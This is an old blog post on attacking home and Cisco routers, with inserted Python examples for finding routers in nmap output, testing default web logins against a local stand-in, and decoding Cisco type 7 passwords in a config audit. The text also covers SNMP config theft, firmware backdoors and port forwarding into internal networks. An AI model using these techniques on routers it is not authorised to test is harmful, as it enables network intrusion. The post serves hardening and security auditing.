Thursday 29 November 2007

Router hacking

Port Scanning
----------------

One of the first steps in targeting routers is a port scan of the suspected addresses. Scanning for TCP ports 23 (telnet) and 80 (HTTP) and UDP port 161 (SNMP) will usually turn up plenty of routers to look at. I recommend using nmap, as its greppable output can be run through grep to pull out the hosts with open ports and written to a file. The next step is to go through the list of routers with a web browser (this may take some time).
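The following is an added example (not code from the original post) of the "nmap plus grep" step above, with the grep replaced by a small parser so the result is structured. It assumes scans such as `nmap -sS -p 23,80 -oG tcp.gnmap 192.0.2.0/24` and `nmap -sU -p 161 -oG udp.gnmap 192.0.2.0/24` were run against a range you are authorised to scan; the `SAMPLE_GNMAP` text is a constructed stand-in for that output, and the port list is an assumption taken from the sections that follow.

```python
"""Pick router candidates out of nmap's greppable output (-oG).

Added example, not from the original post. Replaces a pipeline like
    grep -E '(23|80)/open' tcp.gnmap | awk '{print $2}' > routers.txt
with a parser, so each host keeps which management ports were open.
"""
import re

# Constructed sample of -oG output (not a real scan). One Host: line per host,
# each port written as port/state/proto/owner/service/rpc/version/.
SAMPLE_GNMAP = """\
# Nmap 4.20 scan initiated Thu Nov 29 20:01:33 2007 as: nmap -p 23,80,161 -oG routers.gnmap 192.0.2.0/28
Host: 192.0.2.1 ()\tPorts: 23/open/tcp//telnet///, 80/open/tcp//http///, 161/open|filtered/udp//snmp///
Host: 192.0.2.2 ()\tPorts: 23/closed/tcp//telnet///, 80/open/tcp//http///, 161/closed/udp//snmp///
Host: 192.0.2.3 ()\tPorts: 23/filtered/tcp//telnet///, 80/filtered/tcp//http///, 161/filtered/udp//snmp///
Host: 192.0.2.4 ()\tStatus: Up
# Nmap done at Thu Nov 29 20:02:10 2007 -- 16 IP addresses (4 hosts up) scanned in 37.12 seconds
"""

# port / state / proto / owner / service /  (rpc and version fields ignored)
PORT_RE = re.compile(r"(\d+)/([\w|]+)/(tcp|udp)/[^/]*/([^/]*)/")

# Management services this post goes on to discuss (assumption: these three).
MANAGEMENT_PORTS = ((23, "tcp"), (80, "tcp"), (161, "udp"))


def parse_gnmap(text):
    """Return {address: {(port, proto): state}} from -oG text.

    Lines without a Ports: field (comments, hosts with nothing to report)
    are skipped, so the result only contains hosts nmap said something about.
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        addr = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, _service in PORT_RE.findall(ports_field):
            hosts.setdefault(addr, {})[(int(port), proto)] = state
    return hosts


def router_candidates(hosts, wanted=MANAGEMENT_PORTS):
    """Return {address: [(port, proto), ...]} for hosts with a wanted port open.

    'open|filtered' is counted as a hit: nmap cannot tell an unanswered UDP
    probe from a dropped one, so 161/udp in that state still needs a manual
    check (for example with snmpwalk) before it is dismissed.
    """
    result = {}
    for addr, ports in hosts.items():
        hits = [p for p in wanted if ports.get(p, "").startswith("open")]
        if hits:
            result[addr] = hits
    return result


if __name__ == "__main__":
    for addr, hits in sorted(router_candidates(parse_gnmap(SAMPLE_GNMAP)).items()):
        print(addr, ", ".join("%d/%s" % p for p in hits))
```

Hosts whose only interesting state is "filtered" (192.0.2.3 above) are left out, which is the behaviour the grep pipeline has too; a firewalled router is not necessarily absent, just not reachable from where you scanned.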

Telnet
-------

Telnet is often enabled on routers and listens on port 23. It provides an alternative, command-line configuration interface and so another doorway into the system. If an attacker cannot reach the main configuration page on port 80 he will try port 23, as the login credentials are usually the same. The information and utilities available over telnet are sometimes more detailed than the web interface and can give an attacker a wealth of information as well as tools to penetrate deeper into the network. Telnet is also cleartext, so anyone who can sniff the path to the router picks up the same credentials.

SNMP
------

A lot of routers I have come across run SNMP on UDP port 161. This can be very useful to an attacker: quite often it is left with the default community strings (typically public for read-only and private for read-write), and a read-write community lets an attacker pull down the configuration file (on Cisco devices, for example, by instructing the router over SNMP to copy its config to a TFTP server) and so obtain a copy of the password. Passwords in the config are usually obfuscated, but on Cisco devices the type 7 scheme is a fixed-key XOR that is trivially reversed, and many tools exist on the internet to do it. Only the enable secret (type 5, a salted MD5 hash) needs actual cracking.

HTTP
------

This is the router's built-in web site. The main web configuration page is usually on port 80 and can be reached from any web browser; it gives access to the various utilities for configuring the router. If an attacker has access to this page then it is game over and the router can be considered owned. Many routers provide adequate controls for preventing access, but they are usually disabled or at best weak by default.

Gaining Access
-----------------

Once a router has been found, an attacker has a couple of ways of getting at the main configuration pages: testing the default usernames and passwords, or obtaining the config file with the passwords inside it. Either can give access to the router with relative ease. Personally I am surprised at the number of routers which are not secured.

Default Logins
----------------

Most routers ship with a default login (admin:admin). Disabling the default account or changing its password should prevent access to the web configuration page built into the router. Some routers, such as the ones BT provide, come with no password at all, so attackers wanting to access a network have an easy time with BT users.
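As an added example of the default-login check described above (not code from the original post), the script below tries a short list of common defaults against a router web interface protected by HTTP Basic authentication. The credential list, the URL and the stand-in router are assumptions for the demonstration: the stand-in is a tiny local HTTP server that behaves like a consumer router shipped with admin:admin, so the script runs offline. Only point the real thing at devices you are authorised to test.

```python
"""Check a router's web configuration page for default credentials.

Added example, not from the original post. Works against interfaces that use
HTTP Basic auth (a 401 challenge); form-based logins need a different probe.
"""
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Illustrative list only; real audits use the vendor's documented defaults.
DEFAULT_CREDS = [("admin", "admin"), ("admin", ""), ("admin", "password"), ("", "")]


def try_login(url, user, password, timeout=3):
    """Return True if the page accepts user:password via Basic auth.

    401/403 mean 'rejected' and give False; any other HTTP error is unexpected
    (wrong URL, server fault) and is raised so the caller does not mistake it
    for a rejected password.
    """
    token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
    req = Request(url, headers={"Authorization": "Basic " + token})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return 200 <= resp.status < 300
    except HTTPError as err:
        if err.code in (401, 403):
            return False
        raise


def find_default_login(url, creds=DEFAULT_CREDS):
    """Return the first (user, password) pair the interface accepts, or None."""
    for user, password in creds:
        if try_login(url, user, password):
            return (user, password)
    return None


class _FakeRouter(BaseHTTPRequestHandler):
    """Stand-in for a router web UI: protects '/' with Basic auth, admin:admin."""

    expected = "Basic " + base64.b64encode(b"admin:admin").decode()

    def do_GET(self):
        if self.headers.get("Authorization") == self.expected:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html><body>Router configuration</body></html>")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Router"')
            self.end_headers()

    def log_message(self, *args):  # keep the demonstration quiet
        pass


def start_fake_router():
    """Start the stand-in on a free loopback port and return its base URL."""
    srv = HTTPServer(("127.0.0.1", 0), _FakeRouter)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d/" % srv.server_port


if __name__ == "__main__":
    target = start_fake_router()  # replace with the real router's URL
    print("default login accepted:", find_default_login(target))
```

The stand-in accepts exactly one pair, so a run against it reports `('admin', 'admin')`; against a router whose password has been changed, the same list returns `None`, which is the result you want to see on your own equipment.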

Config Files
--------------

Some routers have SNMP (UDP port 161) enabled by default. This can be used to guess community strings and enumerate various bits of data inside the router. Once a valid string has been found and the configuration, with its password, obtained, the next stage is to crack that password. Finding out the encryption type is a simple matter of googling the router model and reading up on it and the algorithms it uses. Getting into a Cisco was an easy job at one point, as tools were floating around the internet built for decoding the passwords stored in such config files.
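The SNMP section above and this one both come down to the same point: once the config file is in hand, a Cisco type 7 password is not really encrypted. The following added example (not code from the original post) shows why, by implementing the well-known type 7 scheme, a fixed-key XOR whose key is published in every decoder on the internet, and then running a small audit over a constructed config. The sample config, its hash values and the regexes are assumptions for the demonstration; the two type 7 test strings are the standard published examples that decode to "cisco".

```python
"""Audit a Cisco IOS-style configuration for reversible passwords and weak
SNMP communities.

Added example, not from the original post. The type 7 key and scheme are the
well-known ones every IOS device uses; that fixed key is why 'googling the
router' is enough to recover these passwords.
"""
import re

# Fixed XOR key used for type 7 strings on every IOS device.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def type7_decode(enc):
    """Recover the plaintext of a type 7 string.

    Format: two decimal digits giving the key offset, then one hex byte per
    character, each XORed with the key byte at (offset + position).
    """
    if len(enc) < 4 or len(enc) % 2:
        raise ValueError("not a type 7 string: %r" % enc)
    seed = int(enc[:2])
    body = bytes.fromhex(enc[2:])
    return bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]
                 for i, b in enumerate(body)).decode()


def type7_encode(plain, seed=8):
    """Inverse of type7_decode; here only to show the scheme is symmetric."""
    out = bytes(c ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]
                for i, c in enumerate(plain.encode()))
    return "%02d%s" % (seed, out.hex().upper())


# Constructed running-config, not from any real device.
SAMPLE_CONFIG = """\
hostname edge-rtr
enable secret 5 $1$mERr$hx5rVt7rPNoS4wqbXKX7m0
enable password 7 0822455D0A16
username admin privilege 15 password 7 094F471A1A0A
snmp-server community public RO
snmp-server community private RW
line vty 0 4
 password 7 0822455D0A16
 login
"""

PASSWORD7_RE = re.compile(r"\bpassword\s+7\s+([0-9A-Fa-f]+)")
SECRET5_RE = re.compile(r"\bsecret\s+5\s+(\S+)")
SNMP_RE = re.compile(r"^snmp-server community\s+(\S+)(?:\s+(RO|RW))?", re.M)


def audit_config(text):
    """Summarise what an attacker holding this config learns.

    type7:   (config line, recovered plaintext) for every reversible password
    secret5: MD5-crypt hashes, which need an offline dictionary attack instead
    snmp_rw: read-write communities (enough to re-fetch or change the config)
    snmp_ro: read-only communities (enumeration only)
    """
    findings = {"type7": [], "secret5": [], "snmp_rw": [], "snmp_ro": []}
    for line in text.splitlines():
        m = PASSWORD7_RE.search(line)
        if m:
            findings["type7"].append((line.strip(), type7_decode(m.group(1))))
        m = SECRET5_RE.search(line)
        if m:
            findings["secret5"].append(m.group(1))
    for community, mode in SNMP_RE.findall(text):
        key = "snmp_rw" if mode == "RW" else "snmp_ro"  # IOS defaults to RO
        findings[key].append(community)
    return findings


if __name__ == "__main__":
    for line, plain in audit_config(SAMPLE_CONFIG)["type7"]:
        print("%-50s -> %s" % (line, plain))
    print("RW communities:", audit_config(SAMPLE_CONFIG)["snmp_rw"])
```

The practical reading of the audit: replace `enable password` with `enable secret`, remove or rename the default communities and restrict SNMP with an access list, and treat any config that has left the device as already disclosed, since the type 7 lines in it are plaintext to anyone with this 30-line script.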

Advancing your exploration
-------------------------------

Once an attacker has penetrated your router he has a choice: download the firmware, modify it to add a hidden account and reflash it, or start working on your network.

Network Mapping
--------------------

Some routers also have the ability to ping hosts on the local network. This can be used to map out the internal network before setting up port forwarding to reach other systems. It should be disabled to stop malicious users from mapping your network, though if they already have access to the web configuration they can simply enable it again.

Port Forwarding
------------------

Port forwarding provides a sort of gateway to other systems on the network. If you know port 21 (FTP) is open on a system behind the router, forwarding that port and pointing an FTP client at the router's public IP connects it to the FTP service on the internal system.

1 comment:

Unknown said...

Interesting stuff, possibilities are endless, gain access to a private LAN remotely and start sniffing :)